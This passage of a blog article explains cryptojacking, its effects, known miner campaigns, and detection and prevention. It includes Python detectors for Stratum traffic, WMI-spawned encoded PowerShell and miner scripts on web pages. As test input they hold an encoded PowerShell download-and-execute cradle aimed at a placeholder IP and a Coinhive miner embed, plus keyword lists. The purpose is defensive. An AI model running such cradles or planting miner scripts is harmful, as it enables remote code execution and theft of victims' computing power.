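         '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}'),
    Flow("10.0.0.31", "192.0.2.10", 443, "GET / HTTP/1.1"),
    # Pool-looking port but ordinary JSON-RPC: the port alone must not alert.
    Flow("10.0.0.40", "192.0.2.11", 8888,
         '{"jsonrpc": "2.0", "id": 7, "method": "eth_blockNumber", "params": []}'),
]

if __name__ == "__main__":
    for flow, hits in scan(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}: " + "; ".join(hits))
```

The payload check is what carries the decision; port numbers are shared with plenty of legitimate services, which is why the last sample flow stays quiet. Miners that tunnel Stratum over TLS defeat this payload inspection, and then the CPU-load signs described later in this part are what remain.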

The Effects of Cryptojacking

Slows Down Computers

Cryptojacking consumes CPU power, which slows the computer down. Victims experience longer loading times and poor execution speed. Although a cryptojacking script does no harm to the victim's files, it steals computing resources and therefore hurts productivity.

Overheating

Overheating is one of the effects of cryptojacking. Because the CPU is used ceaselessly to mine coins, the computer works round the clock, which results in overheating.

Increased Electricity Bill


Because of the constant activity of their computers, organizations may see an increased electricity bill. Mining consumes a lot of power, and a high electricity bill is one of the main reasons cryptomining is capital intensive. An organization with many cryptojacked computers is likely to experience a noticeable rise in its electricity bill.

Effect on the IT Department

An organization with a cryptojacking problem spends a lot of time and other resources trying to overcome it. Unless the infection is spotted early, the IT department labors to restore cryptojacked computers to working condition and spends a lot of time examining machines to pin down the source of their problems.

Waste of Financial Resources

Cleaning up cryptojacked systems costs money. It requires the intervention of experts and specialized tools.

Short Life Span of Computers

This follows from the first two effects above: a machine kept at full load and running hot wears out sooner.

Effects on Mobile Phones

I pointed out earlier that cryptojacking also affects mobile phones. Here is what Malwarebytes Labs says about the effect of cryptojacking on phones: "Drive-by crypto mining can even infect your Android mobile device. It works with the same methods that target desktops. Some attacks occur through a trojan hidden in a downloaded application, or a user's phone can be redirected to an infected site that leaves a persistent pop-under. There's even a trojan out there that invades Android phones with an installer so nefarious that it can tax the processor to the point that the phone overheats, makes the battery bulge, and essentially leaves your Android for dead." Some obvious effects of cryptojacking on mobile phones:

Hanging
Overheating
A swollen battery
A dead phone

Examples of Cryptojacking Attacks

Coinhive

Coinhive was a service that distributed a JavaScript cryptomining script. The idea was to let website owners earn money without serving ads: visitors would read free content while their devices mined Monero for as long as they stayed on the site, and the mining script stopped as soon as the visitor left. Done with the visitors' consent, the strategy worked at first; people knew their devices were mining coins while they visited certain websites, and many saw it as better than a site covered in ads. Things turned bad when malicious actors abused the idea and began mining with people's devices without their consent. Coinhive kept 30% of the Monero each account mined.


Criminals installed the Coinhive code on hacked websites without the owners' consent or permission. A per-account site key embedded in the script tells Coinhive which account is to be credited with the mined coins, so the attacker, not the site owner, gets paid. Website visitors and website owners complained about Coinhive users exploiting their sites and devices to mine Monero without consent. In response to this criticism, Coinhive released another version of the mining script called AuthedMine, which differs from the original in that it asks for the website visitor's explicit consent before it starts mining. Coinhive's business idea was sound, and some well-known websites used the service legitimately, but hackers took advantage of it for their malicious ends.

Crypto-Loot

Crypto-Loot, like Coinhive, is a platform that offers website owners a script for mining cryptocurrency with the computing power of the devices that visit their websites. Like Coinhive, the service was designed to let webmasters earn money legitimately, with their visitors' approval. Cybercriminals abused it by planting the Crypto-Loot script in compromised websites and browser extensions, stealing the processing power of visitors' devices to mine coins. Whereas Coinhive keeps 30% of the Monero its users mine, Crypto-Loot keeps 12%.

PowerGhost

PowerGhost is fileless cryptomining malware that targets corporate networks and workstations. It writes no files to disk and runs entirely in memory. It gains access by exploiting vulnerabilities in systems and by abusing remote administration tools, and it uses PowerShell and the EternalBlue exploit to infect servers and workstations and spread across the network without being noticed. Its fileless design and other evasion techniques help it avoid detection by antivirus programs. Kaspersky Lab also found a version of this malware that carries a DDoS tool, which suggests that the criminals can use it for DDoS attacks as well, giving them another income stream.

Smominru Botnet

Smominru is a cryptomining botnet that infects Windows systems and servers using the EternalBlue and EsteemAudit exploits and mines Monero on the hijacked machines. It also attacks MySQL databases on Windows and Linux servers. Proofpoint reported that the botnet had infected more than 526,000 Windows hosts, believed to be mainly servers, with Russia, India and Taiwan the most affected countries.

WannaMine

WannaMine is hard to detect and block. It infects machines through malicious links, email attachments and infected websites, and it mines Monero. It was discovered by Panda Security. WannaMine is fileless malware, which makes it very difficult to deal with: it installs no files on the machine it infects and instead lives off tools already present on the system, so its detection eludes antivirus programs. It taxes computers so heavily that it can wear them out, imposing serious replacement costs on organizations.

According to Panda Security, WannaMine spreads across networks cleverly. It uses PowerShell and Windows Management Instrumentation (WMI) to spread remotely, capturing login credentials that let it connect to other computers. Panda Security notes that when this fails WannaMine switches to another strategy and uses the EternalBlue exploit to spread itself. WannaMine is difficult to uncover and block because it is fileless and uses built-in Windows tools to do its work.
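Both PowerGhost and WannaMine, as described above, run PowerShell through WMI rather than dropping files, so process-creation telemetry is where they become visible. The added Python example below, written for this edition and not taken from the page or from any vendor, scores constructed Sysmon-style process events on two tells: a shell whose parent is the WMI provider host (WmiPrvSE.exe), and an -EncodedCommand argument, which it decodes (base64 of UTF-16LE text) and inspects for download-and-execute or miner strings. The event records, host names and the URL inside the payload are made up for the example.

```python
import base64
import re
from dataclasses import dataclass

# Added example: two heuristics for fileless, WMI-driven miners in process
# creation events. Records are constructed; adapt field names to your telemetry.


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                         re.IGNORECASE)
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Invoke-WmiMethod", "stratum+tcp", "xmrig")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the clear-text script behind -EncodedCommand, or None.
    PowerShell expects base64 of the script encoded as UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(ev):
    """List the reasons an event looks like WMI-driven fileless execution."""
    reasons = []
    if basename(ev.parent_image) == "wmiprvse.exe" and basename(ev.image) in SHELLS:
        reasons.append("shell spawned by WMI provider host")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        lowered = decoded.lower()
        reasons.extend(f"payload contains {s}" for s in SUSPICIOUS if s.lower() in lowered)
    return reasons


# Constructed sample: a download cradle, encoded the way an attacker would.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.9/in6.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcEvent("ws-01", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoP -NonI -W Hidden -EncodedCommand {ENCODED}"),
    # Benign: an administrator's scheduled script launched from Explorer.
    ProcEvent("ws-02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.host, assess(ev) or "clean")
```

Neither tell is proof on its own: management tooling does spawn processes through WMI, and encoded commands are used legitimately. What makes the combination worth an alert is a hidden, non-interactive shell under WmiPrvSE.exe whose decoded payload fetches and executes remote code, which is exactly the spreading step Panda Security describes.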

How to Detect Cryptomining Malware

There are signs of cryptojacker infection. When you notice some of these signs, your device may have been infected with a cryptojacker. Here are the signs you should be conscious of:

Cryptomining malware slows devices down
It causes devices to overheat
It causes a spike in CPU usage
It causes a spike in electricity bills

Train your employees: everyone in an organization should be able to recognize these signs.

How to Avoid Cryptominer Infection

Block JavaScript in your browser. This will also stop some legitimate site functions from working. Use anti-cryptojacking programs: specialized browser extensions such as No Coin and MinerBlock block cryptojacking in popular browsers, and it is advisable to use a browser that has built-in anti-cryptojacking protection.
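Extensions such as No Coin and MinerBlock work largely from a blocklist of miner script origins and API names. The added Python example below (example code for this edition, not the extensions' own code) reduces that approach to its essentials: it pulls script sources and inline script bodies out of a page and checks them against a small list. The hosts are the historical Coinhive, AuthedMine and Crypto-Loot script origins, the API names are the constructor calls those services documented (new CoinHive.Anonymous(...), new CRLT.Anonymous(...)), and the sample page is constructed. The lists are illustrative and would need maintaining: Coinhive itself shut down in 2019, and miner scripts are routinely moved to fresh domains, so a blocklist should be paired with the CPU-usage signs listed above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added example: the blocklist approach of anti-cryptojacking extensions, in
# miniature. Hosts and API names are historical/illustrative, not exhaustive.
BLOCKED_HOSTS = {"coinhive.com", "coin-hive.com", "authedmine.com", "crypto-loot.com"}
INLINE_SIGNATURES = ("CoinHive.Anonymous", "CoinHive.User", "CRLT.Anonymous")


class ScriptExtractor(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.sources = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def host_blocked(url):
    """True if the script URL's host is, or is under, a blocked domain.
    Handles absolute and protocol-relative (//host/...) URLs; relative paths
    have no host and are never blocked by this check."""
    host = (urlparse(url if "//" in url else "https://" + url).hostname or "").lower()
    return any(host == b or host.endswith("." + b) for b in BLOCKED_HOSTS)


def find_miners(html):
    """Return a list of findings; an empty list means nothing matched."""
    parser = ScriptExtractor()
    parser.feed(html)
    findings = [f"blocked script host: {s}" for s in parser.sources if host_blocked(s)]
    for body in parser.inline:
        findings.extend(f"miner API call: {sig}" for sig in INLINE_SIGNATURES if sig in body)
    return findings


# Constructed sample page: the classic Coinhive embed next to a normal script.
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="/static/app.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('constructed-site-key', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in find_miners(SAMPLE_PAGE) or ["clean"]:
        print(finding)
```

A real extension applies the host check at request time (before the script is fetched) and the inline check on the page as rendered; this script shows the decision logic only. It says nothing about a miner loaded from a domain not on the list, which is the main weakness of pure blocklists.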


Make sure your device has no security loopholes: update your OS and applications as soon as new updates are released. Have a strict cyber security policy, which means investing in security tools and staff training. Monitor your devices continuously; close monitoring helps you discover an infection early.

How to Contain a Cryptojacking Attack

Involve experts early. Avoid making a series of mistakes before calling in people who can help you; they will help you formulate an appropriate recovery plan. Identify how you were infected and close that gap. Then formulate a strict security policy.

Thanks for reading.


A LITTLE ABOUT ME

I'm Anyalebechi Elisha Odo. I'm a technology blogger.

I offer freelance writing service.

Visit my website (anyaelisha.org) to know more about me.

You can contact me: [email protected]